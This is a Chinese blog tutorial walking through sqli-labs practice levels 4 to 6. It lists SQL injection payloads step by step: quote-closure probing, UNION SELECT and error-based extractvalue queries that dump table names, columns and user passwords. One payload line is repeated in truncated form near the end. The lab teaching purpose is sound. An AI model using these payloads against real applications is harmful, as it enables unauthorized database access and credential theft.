sqli-lib4-6关教程

SERIES-4

输入?id=1

image-20240525082820750

输入?id=2-1,说明该数据类型为字符型

image-20240525082845788

输入?id=1’

image-20240525083231069

输入?id=1",说明闭合符号为"

image-20240525082954586

输入?id=1")–+

image-20240525083342096

输入?id=1") order by 3–+

image-20240525083631326

输入?id=1") order by 4–+

image-20240525083653483

数据共三列,输入?id=-1") union select 1,2,3 --+

image-20240525084013918

回显位为2和3,输入?id=-1") union select 1,database(),version()–+查看当前数据库和数据库版本

image-20240525084346724

输入?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+查看当前数据库中的所有表

image-20240525084447901

输入?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’–+查看user表中的所有列

image-20240525084539031

输入?id=-1") union select 1,2,group_concat(username ,id , password) from users–+查看user表中的字段

image-20240525084647168

SERIES-5

通过查看源码能成功执行的语句都会返回you are in错误则没有返回

输入?id=1

image-20240525084750556

输入?id=2-1,

image-20240525084813245

输入?id=1’,报错,说明数据类型为字符型,闭合符号位单引号

image-20240525084852557

输入?id=1",说明闭合符号为单引号

image-20240525084930121

由此我们能判断出可以使用布尔类型的返回,使用报错注入

首先查看所有库?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),63,31) from information_schema.schemata),0x7e))) --+

image-20240525091206412

输入?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(table_name),1,31) from information_schema.tables where table_schema=database()),0x7e))) --+查看当前库里面的所有表

image-20240525091324064

输入?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(column_name),60,31) from information_schema.columns where table_schema=database()),0x7e))) --+查看users表里面的所有列

image-20240525091423424

输入?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(username,password),1,31) from security.users),0x7e))) --+查看用户名和密码

image-20240525091521769

SERIES-6

输入?id=1image-20240525091600881

输入?id=2-1,此时不能判断是什么数据类类型

image-20240525091701207

输入?id=1’,页面无报错

image-20240525091742135

输入?id=1",说明闭合符号为双引号

image-20240525091815613

利用报错注入

输入?id=1" and (extractvalue(1,concat(0x7e,(select substr(group_concat(table_name),1,31) from information_schema.tables where table_schema=database()),0x7e))) --+查看所有数据库

image-20240525091936542

输入?id=1" and (extractvalue(1,concat(0x7e,(select substr(group_concat(column_name),60,31) from information_schema.columns where table_schema=database()),0x7e))) --+查看users表里面的所有列

image-20240525092138224

输入?id=1" and (extractvalue(1,concat(0x7e,(select substr(group_concat(username,password),1,31) from security.users),0x7e))) --+查看用户名和密码

ractvalue(1,concat(0x7e,(select substr(group_concat(username,password),1,31) from security.users),0x7e))) --+查看用户名和密码

image-20240525092209289

  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值